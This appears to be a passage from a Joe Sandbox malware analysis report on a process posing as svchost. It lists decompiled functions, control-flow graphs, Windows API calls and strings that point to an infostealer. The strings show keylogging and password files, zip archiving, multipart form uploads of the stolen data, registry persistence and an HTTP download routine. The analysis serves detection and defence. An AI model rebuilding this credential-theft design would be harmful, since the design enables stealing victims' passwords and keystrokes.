                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C82690
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C826DC
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C826E9
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 02C8272A
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C8275A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C82BF2
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02C82BFF
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C82C12
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C82C1F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C43
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C82C46
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C52
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C82C55
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C63
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C82C66
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C72
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C82C75
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD888), ref: 02C82C7C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Path$FileProcess$BackslashCurrentDirectory$CriticalFreeSectionValidate$AttributesCopyDeleteEnterExistsFolderLeave_snprintf
                                                                                                                                                                                                            • String ID: -----------------------------$%s%s$%s%u.zip$--$-----------------------------$3abfb9076ff185e9$92F35D60a$92f35d24a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt$software\microsoft
                                                                                                                                                                                                            • API String ID: 390830577-3892896613
                                                                                                                                                                                                            • Opcode ID: e4eac7c1d77b19ea306828177a987b61ff49e9db60d14e95b29b38cd4e43e4e9
                                                                                                                                                                                                            • Instruction ID: 153a4528031931f15edd3c276ebaa6aa38732b7f5ceb29a19e473fb53db9173c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4eac7c1d77b19ea306828177a987b61ff49e9db60d14e95b29b38cd4e43e4e9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58124A719442C65BDB169F309C98BFBBBA5FF85308F0486D4ED869B240DB32DA09C791
                                                                                                                                                                                                            Function 02C82669 Relevance: 91.5, APIs: 37, Strings: 15, Instructions: 528fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 447 2c82669 448 2c82670-2c82681 447->448 448->448 449 2c82683-2c82699 PathAddBackslashA 448->449 450 2c826a0-2c826a6 449->450 450->450 451 2c826a8-2c826f0 SHGetFolderPathA PathAddBackslashA 450->451 452 2c826f2-2c826f7 451->452 452->452 453 2c826f9-2c82703 452->453 454 2c82704-2c8270a 453->454 454->454 455 2c8270c-2c82732 CopyFileA 454->455 456 2c82740-2c82751 455->456 456->456 457 2c82753-2c82762 PathAddBackslashA 456->457 458 2c82763-2c82769 457->458 458->458 459 2c8276b-2c82793 458->459 460 2c82798-2c8279c 459->460 461 2c827b8-2c827ba 460->461 462 2c8279e-2c827a0 460->462 465 2c827bd-2c827bf 461->465 463 2c827a2-2c827a8 462->463 464 2c827b4-2c827b6 462->464 463->461 466 2c827aa-2c827b2 463->466 464->465 467 2c827dd-2c8281b GetTickCount _snprintf VirtualAlloc 465->467 468 2c827c1-2c827d7 SetFileAttributesA DeleteFileA 465->468 466->460 466->464 469 2c82beb-2c82c07 SetCurrentDirectoryA PathFileExistsA 467->469 470 2c82821-2c82844 lstrcpynA call 2c97b50 467->470 468->467 472 2c82c09-2c82c1f SetFileAttributesA DeleteFileA 469->472 473 2c82c25-2c82c3b 469->473 478 2c82855-2c8289c VirtualFree call 2c766d0 SetFileAttributesA RemoveDirectoryA call 2c76930 470->478 479 2c82846-2c82850 call 2c97ce0 call 2c97c50 470->479 472->473 474 2c82c3d-2c82c4a GetProcessHeap HeapValidate 473->474 475 2c82c57-2c82c5b 473->475 474->475 477 2c82c4c-2c82c55 GetProcessHeap HeapFree 474->477 480 2c82c5d-2c82c6a GetProcessHeap HeapValidate 475->480 481 2c82c77-2c82c8a LeaveCriticalSection 475->481 477->475 478->469 490 2c828a2 478->490 479->478 480->481 483 2c82c6c-2c82c75 GetProcessHeap HeapFree 480->483 483->481 491 2c828a5-2c828aa 490->491 491->491 492 2c828ac-2c828b5 491->492 493 2c828df-2c828e4 492->493 494 2c828b7-2c828d1 GetProcessHeap HeapAlloc 492->494 493->469 495 2c828ea-2c828ff 493->495 494->493 496 2c828d3-2c828dc memset 494->496 497 2c82901-2c82906 495->497 496->493 497->497 498 2c82908-2c8290d 497->498 499 2c82910-2c82916 498->499 499->499 500 2c82918-2c82929 499->500 501 2c82930-2c82936 500->501 501->501 502 2c82938-2c8294e 501->502 503 2c82950-2c82956 502->503 503->503 504 2c82958-2c8296b 503->504 505 2c82970-2c82975 504->505 505->505 506 2c82977-2c8297c 505->506 507 2c82980-2c82986 506->507 507->507 508 2c82988-2c82999 507->508 509 2c829a0-2c829a6 508->509 509->509 510 2c829a8-2c829ba call 2c732f0 509->510 513 2c829c0-2c829c5 510->513 513->513 514 2c829c7-2c829cc 513->514 515 2c829d0-2c829d6 514->515 515->515 516 2c829d8-2c829e9 515->516 517 2c829f0-2c829f6 516->517 517->517 518 2c829f8-2c82a0b 517->518 519 2c82a10-2c82a15 518->519 519->519 520 2c82a17-2c82a1c 519->520 521 2c82a20-2c82a26 520->521 521->521 522 2c82a28-2c82a39 521->522 523 2c82a40-2c82a46 522->523 523->523 524 2c82a48-2c82a5e 523->524 525 2c82a60-2c82a66 524->525 525->525 526 2c82a68-2c82a75 525->526 527 2c82a78-2c82a7e 526->527 527->527 528 2c82a80-2c82a90 527->528 529 2c82a92-2c82a97 528->529 529->529 530 2c82a99-2c82a9e 529->530 531 2c82aa0-2c82aa6 530->531 531->531 532 2c82aa8-2c82ab9 531->532 533 2c82ac0-2c82ac6 532->533 533->533 534 2c82ac8-2c82adb 533->534 535 2c82ae0-2c82ae5 534->535 535->535 536 2c82ae7-2c82aec 535->536 537 2c82af0-2c82af6 536->537 537->537 538 2c82af8-2c82b09 537->538 539 2c82b10-2c82b16 538->539 539->539 540 2c82b18-2c82b2f 539->540 541 2c82b31-2c82b33 540->541 542 2c82b36-2c82b3b 541->542 542->542 543 2c82b3d-2c82b48 call 2c82410 542->543 546 2c82b4a-2c82b55 Sleep 543->546 547 2c82b57-2c82b5f 543->547 546->541 546->547 548 2c82b60-2c82b64 547->548 549 2c82b80-2c82b82 548->549 550 2c82b66-2c82b68 548->550 553 2c82b85-2c82b87 549->553 551 2c82b6a-2c82b70 550->551 552 2c82b7c-2c82b7e 550->552 551->549 554 2c82b72-2c82b7a 551->554 552->553 553->469 555 2c82b89-2c82bbd IsUserAnAdmin GetTickCount RegOpenKeyExA 553->555 554->548 554->552 555->469 556 2c82bbf-2c82be5 RegSetValueExA RegFlushKey RegCloseKey 555->556 556->469
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C82690
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C826DC
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C826E9
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 02C8272A
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C8275A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$CopyFileFolder
                                                                                                                                                                                                            • String ID: -----------------------------$%s%u.zip$--$-----------------------------$3abfb9076ff185e9$92F35D60a$92f35d24a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt$software\microsoft
                                                                                                                                                                                                            • API String ID: 3190534014-1331890041
                                                                                                                                                                                                            • Opcode ID: e2c056e245c04198f486efb39f8410ec92e6f80c18de7ac40bc212f9070211ba
                                                                                                                                                                                                            • Instruction ID: 865299569bd8b8cbb1b101e5ee340d48d98818a7844a4a17295b00d0828f261b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2c056e245c04198f486efb39f8410ec92e6f80c18de7ac40bc212f9070211ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 290249319442D65BDB169F3098A8BFBBBE5FF85308F148584ED869B240DB32DA09C791
                                                                                                                                                                                                            Function 02C740F0 Relevance: 86.0, APIs: 35, Strings: 14, Instructions: 267memorynetworkfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 557 2c740f0-2c7411a GetProcessHeap HeapAlloc 558 2c7412c-2c74187 557->558 559 2c7411c-2c74129 memset 557->559 560 2c743c4-2c743ca 558->560 561 2c7418d-2c7419d GetTcpTable 558->561 559->558 562 2c74200-2c74202 561->562 563 2c7419f-2c741ad GetProcessHeap HeapValidate 561->563 566 2c74204-2c74212 GetProcessHeap HeapValidate 562->566 567 2c7422d-2c7423a 562->567 564 2c741af-2c741b5 GetProcessHeap HeapFree 563->564 565 2c741bb-2c741c2 563->565 564->565 568 2c741c4-2c741da GetProcessHeap HeapAlloc 565->568 569 2c741e8-2c741ed 565->569 566->560 570 2c74218-2c7422a GetProcessHeap HeapFree 566->570 571 2c743d0-2c743dd call 2c82d20 567->571 572 2c74240-2c74259 GetProcessHeap HeapAlloc 567->572 568->569 573 2c741dc-2c741e5 memset 568->573 569->560 574 2c741f3-2c741fa GetTcpTable 569->574 576 2c7425f-2c74272 memset 572->576 577 2c743cd 572->577 573->569 574->562 579 2c74274-2c7427c 576->579 577->571 579->579 580 2c7427e-2c7428b 579->580 581 2c74363 580->581 582 2c74291 580->582 583 2c74366-2c7436c 581->583 584 2c74294-2c742a1 call 2c74000 582->584 583->583 585 2c7436e-2c74383 583->585 590 2c742a7-2c742b4 call 2c74000 584->590 591 2c7434b-2c7435a 584->591 587 2c74386-2c7438b 585->587 587->587 589 2c7438d-2c743b6 WriteFile GetProcessHeap HeapValidate 587->589 589->560 592 2c743b8-2c743be GetProcessHeap HeapFree 589->592 596 2c742b6-2c742bc 590->596 597 2c7432f-2c7433d GetProcessHeap HeapValidate 590->597 591->584 594 2c74360 591->594 592->560 594->581 598 2c742c0-2c742c5 596->598 597->591 599 2c7433f-2c74345 GetProcessHeap HeapFree 597->599 598->598 600 2c742c7-2c7431e htons * 2 _snprintf GetProcessHeap HeapValidate 598->600 599->591 601 2c74320-2c74326 GetProcessHeap HeapFree 600->601 602 2c7432c 600->602 601->602 602->597
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,755735B0,00000000), ref: 02C7410D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C74110
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C74124
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C74194
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741A2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C741A5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741B2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C741B5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C741CD
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C741D0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C741E0
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C741FA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74207
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7420A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7421B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7421E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000083), ref: 02C74249
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7424C
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C74263
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02C742D9
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02C742EC
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C74307
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74313
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C74316
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74323
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C74326
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02C74332
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C74335
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74342
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C74345
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000C00,00000000,00000001,?,00000000), ref: 02C743A2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743AB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C743AE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743BB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C743BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate$Allocmemset$Tablehtons$FileWrite_snprintf
                                                                                                                                                                                                            • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                            • API String ID: 3573621883-2402783461
                                                                                                                                                                                                            • Opcode ID: cdf18205eaf4d770cafe0dd934a66c4fea390b45350f0fdebda89808dd7fe703
                                                                                                                                                                                                            • Instruction ID: 6fd2147aa34d27987b0607b3265e8337516b80a64b11be02324dc0ca9855ac84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdf18205eaf4d770cafe0dd934a66c4fea390b45350f0fdebda89808dd7fe703
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D91C7B1E40289ABDB259FA5EC88FAF7F78EF85705F144594E508E7281DB30D504CB61
                                                                                                                                                                                                            Function 02C82734 Relevance: 81.0, APIs: 33, Strings: 13, Instructions: 467filememorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 603 2c82734-2c8273b 604 2c82740-2c82751 603->604 604->604 605 2c82753-2c82762 PathAddBackslashA 604->605 606 2c82763-2c82769 605->606 606->606 607 2c8276b-2c82793 606->607 608 2c82798-2c8279c 607->608 609 2c827b8-2c827ba 608->609 610 2c8279e-2c827a0 608->610 613 2c827bd-2c827bf 609->613 611 2c827a2-2c827a8 610->611 612 2c827b4-2c827b6 610->612 611->609 614 2c827aa-2c827b2 611->614 612->613 615 2c827dd-2c8281b GetTickCount _snprintf VirtualAlloc 613->615 616 2c827c1-2c827d7 SetFileAttributesA DeleteFileA 613->616 614->608 614->612 617 2c82beb-2c82c07 SetCurrentDirectoryA PathFileExistsA 615->617 618 2c82821-2c82844 lstrcpynA call 2c97b50 615->618 616->615 620 2c82c09-2c82c1f SetFileAttributesA DeleteFileA 617->620 621 2c82c25-2c82c3b 617->621 626 2c82855-2c8289c VirtualFree call 2c766d0 SetFileAttributesA RemoveDirectoryA call 2c76930 618->626 627 2c82846-2c82850 call 2c97ce0 call 2c97c50 618->627 620->621 622 2c82c3d-2c82c4a GetProcessHeap HeapValidate 621->622 623 2c82c57-2c82c5b 621->623 622->623 625 2c82c4c-2c82c55 GetProcessHeap HeapFree 622->625 628 2c82c5d-2c82c6a GetProcessHeap HeapValidate 623->628 629 2c82c77-2c82c8a LeaveCriticalSection 623->629 625->623 626->617 638 2c828a2 626->638 627->626 628->629 631 2c82c6c-2c82c75 GetProcessHeap HeapFree 628->631 631->629 639 2c828a5-2c828aa 638->639 639->639 640 2c828ac-2c828b5 639->640 641 2c828df-2c828e4 640->641 642 2c828b7-2c828d1 GetProcessHeap HeapAlloc 640->642 641->617 643 2c828ea-2c828ff 641->643 642->641 644 2c828d3-2c828dc memset 642->644 645 2c82901-2c82906 643->645 644->641 645->645 646 2c82908-2c8290d 645->646 647 2c82910-2c82916 646->647 647->647 648 2c82918-2c82929 647->648 649 2c82930-2c82936 648->649 649->649 650 2c82938-2c8294e 649->650 651 2c82950-2c82956 650->651 651->651 652 2c82958-2c8296b 651->652 653 2c82970-2c82975 652->653 653->653 654 2c82977-2c8297c 653->654 655 2c82980-2c82986 654->655 655->655 656 2c82988-2c82999 655->656 657 2c829a0-2c829a6 656->657 657->657 658 2c829a8-2c829ba call 2c732f0 657->658 661 2c829c0-2c829c5 658->661 661->661 662 2c829c7-2c829cc 661->662 663 2c829d0-2c829d6 662->663 663->663 664 2c829d8-2c829e9 663->664 665 2c829f0-2c829f6 664->665 665->665 666 2c829f8-2c82a0b 665->666 667 2c82a10-2c82a15 666->667 667->667 668 2c82a17-2c82a1c 667->668 669 2c82a20-2c82a26 668->669 669->669 670 2c82a28-2c82a39 669->670 671 2c82a40-2c82a46 670->671 671->671 672 2c82a48-2c82a5e 671->672 673 2c82a60-2c82a66 672->673 673->673 674 2c82a68-2c82a75 673->674 675 2c82a78-2c82a7e 674->675 675->675 676 2c82a80-2c82a90 675->676 677 2c82a92-2c82a97 676->677 677->677 678 2c82a99-2c82a9e 677->678 679 2c82aa0-2c82aa6 678->679 679->679 680 2c82aa8-2c82ab9 679->680 681 2c82ac0-2c82ac6 680->681 681->681 682 2c82ac8-2c82adb 681->682 683 2c82ae0-2c82ae5 682->683 683->683 684 2c82ae7-2c82aec 683->684 685 2c82af0-2c82af6 684->685 685->685 686 2c82af8-2c82b09 685->686 687 2c82b10-2c82b16 686->687 687->687 688 2c82b18-2c82b2f 687->688 689 2c82b31-2c82b33 688->689 690 2c82b36-2c82b3b 689->690 690->690 691 2c82b3d-2c82b48 call 2c82410 690->691 694 2c82b4a-2c82b55 Sleep 691->694 695 2c82b57-2c82b5f 691->695 694->689 694->695 696 2c82b60-2c82b64 695->696 697 2c82b80-2c82b82 696->697 698 2c82b66-2c82b68 696->698 701 2c82b85-2c82b87 697->701 699 2c82b6a-2c82b70 698->699 700 2c82b7c-2c82b7e 698->700 699->697 702 2c82b72-2c82b7a 699->702 700->701 701->617 703 2c82b89-2c82bbd IsUserAnAdmin GetTickCount RegOpenKeyExA 701->703 702->696 702->700 703->617 704 2c82bbf-2c82be5 RegSetValueExA RegFlushKey RegCloseKey 703->704 704->617
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C8275A
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C827CA
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C827D7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C827DD
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C827FA
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02C82811
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C8282E
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02C8285D
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,?), ref: 02C82878
                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(?), ref: 02C82885
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$AttributesVirtual$AllocBackslashCountDeleteDirectoryFreePathRemoveTick_snprintflstrcpyn
                                                                                                                                                                                                            • String ID: -----------------------------$%s%u.zip$--$-----------------------------$3abfb9076ff185e9$92f35d24a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt$software\microsoft
                                                                                                                                                                                                            • API String ID: 1417698165-101714038
                                                                                                                                                                                                            • Opcode ID: 96d1b09aead743ab749e9d87d7ed4e3c3599536a2fc97adc4ee112459d75ba1f
                                                                                                                                                                                                            • Instruction ID: 5c746aca08dc5a9761cd58d6ee12c124871ebf8dfcb3648c4e6165b6ec53c4f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96d1b09aead743ab749e9d87d7ed4e3c3599536a2fc97adc4ee112459d75ba1f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F14A319442D65BDF169F3098ACBFBBBA5FF85308F048584ED869B240DB32DA09C791
                                                                                                                                                                                                            Function 02C83620 Relevance: 72.1, APIs: 33, Strings: 8, Instructions: 311memorynetworkfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 766 2c83620-2c83665 memset 767 2c8366b-2c8366e 766->767 768 2c839a2-2c839aa 766->768 767->768 769 2c83674-2c83677 767->769 770 2c83679-2c8367b 769->770 771 2c836d1-2c836ee InternetOpenA 769->771 772 2c83681-2c8368f 770->772 773 2c839ad-2c839b5 771->773 774 2c836f4-2c8370c InternetConnectA 771->774 772->772 775 2c83691-2c83693 772->775 776 2c8398f-2c8399f InternetCloseHandle 774->776 777 2c83712-2c8371a 774->777 778 2c836a0-2c836b1 775->778 779 2c8371c 777->779 780 2c83721-2c8373e HttpOpenRequestA 777->780 781 2c836b3 778->781 782 2c836b5-2c836bc 778->782 779->780 783 2c83744-2c8374e 780->783 784 2c83985-2c8398c InternetCloseHandle 780->784 781->782 782->778 787 2c836be-2c836cc call 2c86c40 782->787 785 2c83750-2c83753 783->785 786 2c83764-2c83776 HttpAddRequestHeadersA 783->786 784->776 785->786 788 2c83755-2c83762 HttpAddRequestHeadersA 785->788 789 2c837a8-2c837bb HttpSendRequestA 786->789 790 2c83778-2c837a6 _snprintf HttpAddRequestHeadersA 786->790 787->771 788->786 792 2c8397b-2c83982 InternetCloseHandle 789->792 793 2c837c1-2c837db HttpQueryInfoA 789->793 790->789 792->784 793->792 794 2c837e1-2c837e8 793->794 794->792 795 2c837ee-2c83814 CreateFileA 794->795 795->792 796 2c8381a 795->796 797 2c83820-2c83834 GetProcessHeap HeapAlloc 796->797 798 2c8383a-2c83867 memset InternetReadFile 797->798 799 2c838c3-2c838c5 797->799 800 2c83869-2c8386e 798->800 801 2c838a7-2c838b5 GetProcessHeap HeapValidate 798->801 802 2c838ea-2c838fe call 2c76570 799->802 803 2c838c7-2c838db GetHandleInformation 799->803 800->801 806 2c83870-2c83894 WriteFile GetProcessHeap HeapValidate 800->806 801->799 807 2c838b7-2c838bd GetProcessHeap HeapFree 801->807 811 2c83978 802->811 812 2c83900-2c8390a 802->812 803->802 804 2c838dd-2c838e1 803->804 804->802 808 2c838e3-2c838e4 CloseHandle 804->808 806->797 810 2c83896-2c838a2 GetProcessHeap HeapFree 806->810 807->799 808->802 810->797 811->792 813 2c83910-2c8391e 812->813 813->813 814 2c83920 813->814 815 2c83922-2c83933 814->815 816 2c83935 815->816 817 2c83937-2c8393e 815->817 816->817 817->815 818 2c83940-2c8396a call 2c86c40 call 2c764d0 GetProcessHeap HeapValidate 817->818 818->811 823 2c8396c-2c83972 GetProcessHeap HeapFree 818->823 823->811
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83655
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8378E
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C8382A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83842
                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
